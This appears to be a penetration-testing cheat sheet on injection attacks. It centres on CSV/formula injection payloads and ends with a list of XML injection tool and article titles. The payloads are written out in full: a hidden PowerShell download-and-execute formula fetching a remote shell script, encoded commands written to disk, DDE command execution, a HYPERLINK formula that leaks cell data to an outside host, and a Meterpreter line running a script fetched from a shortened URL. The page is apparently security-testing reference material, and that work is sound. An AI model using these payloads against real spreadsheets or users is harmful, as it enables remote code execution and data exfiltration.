Injection
Injection¶
CSV Injection¶
https://know.bishopfox.com/blog/2018/06/server-side-spreadsheet-injections
https://www.notsosecure.com/data-exfiltration-formula-injection/
Powershell payload:
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString("http://bishopfox.com/shell.ps1");
powershell -e $e'!A1
+cmd|'/C echo|set /p="ACQAYwBtAGQAKQAgAHsACgAkAGMAIAA9ACAAaQBlAHgAIAAkAGMAbQBkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkA" >> C:\ProgramData\activePDF\Temp\a.enc'!A0
-cmd|'/C echo|set /p="ACQAYwBtAGQAKQAgAHsACgAkAGMAIAA9ACAAaQBlAHgAIAAkAGMAbQBkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkA" >> C:\ProgramData\activePDF\Temp\a.enc'!A0
@cmd|'/C echo|set /p="ACQAYwBtAGQAKQAgAHsACgAkAGMAIAA9ACAAaQBlAHgAIAAkAGMAbQBkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkA" >> C:\ProgramData\activePDF\Temp\a.enc'!A0
=DDE(server; file; item; mode)
=DDE("cmd";"/C calc";"__DdeLink_60_870516294")
Check Web Responses:
=WEBSERVICE(“http://bishopfox.com”
=WEBSERVICE(“https://bishopfox.com”)
=WEBSERVICE(“http://dnstest.bishopfox.com”)
=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information")
Newline character¶
%0A-3+3+cmd|' /C calc'!D2
Meterpreter Shell¶
=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0
XML Injection¶
Aid blind XPath injection vulnerabilities
Vulnerable Java web application
XML Schema, DTD, and Entity Attacks
Tool that implements the Golden SAML attack
A New Era of SSRF Exploiting URL Parser in Trending Programming Languages!
Use WSDL files to send SOAP Messages
Java RMI enumeration and attack tool